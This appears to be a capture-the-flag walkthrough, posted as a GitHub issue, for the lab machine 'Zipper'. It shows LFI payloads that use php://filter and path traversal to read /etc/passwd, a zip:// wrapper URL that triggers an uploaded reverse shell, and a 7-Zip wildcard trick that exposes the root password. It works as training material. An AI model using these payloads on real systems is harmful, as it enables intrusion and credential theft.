WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Zipper (Hard, linux, 2022) #43

Open WDavid404 opened 3 months ago

WDavid404 commented 3 months ago

Keypoints:

WDavid404 commented 3 months ago
PORT      STATE    SERVICE     REASON         VERSION
22/tcp    open     ssh         syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http        syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Zipper

80/tcp --> click the link of "Home(current)", go to http://192.168.196.229/index.php?**file=home** --> it may have LFI vulnebility.

Try

../../../../../../etcpasswd 
php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd
..

--> didn't work

finally, php://filter/convert.base64-encode/resource=index --> image

Try php://filter/convert.base64-encode/resource=upload(because we found /upload page) image

https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/ --> 192.168.196.229/index.php?file=zip://uploads/upload_1722343257.zip%23php_reverse_me1
(Note:

PE

linpeas:

cat /opt/backups/backup.log --->

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor                 (A00F11),ASM,AES-NI)

Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 818

Scanning the drive:
3 files, 394 bytes (1 KiB)

Updating archive: /opt/backups/backup.zip

Items to compress: 3

Files read from disk: 3
Archive size: 818 bytes (1 KiB)

Scan WARNINGS for files and folders:

WildCardsGoingWild : No more files
----------------
Scan WARNINGS: 1

According to https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks image image and execute cat /opt/backups/backup.log again --> No change...

And we can fing that there were @enox.zip and enox.zip -> /root/secret is doing the thing we just do. so, "WildCardsGoingWild" in backup.log file is actually the secret of root Try su root and use WildCardsGoingWild as password --> works!! image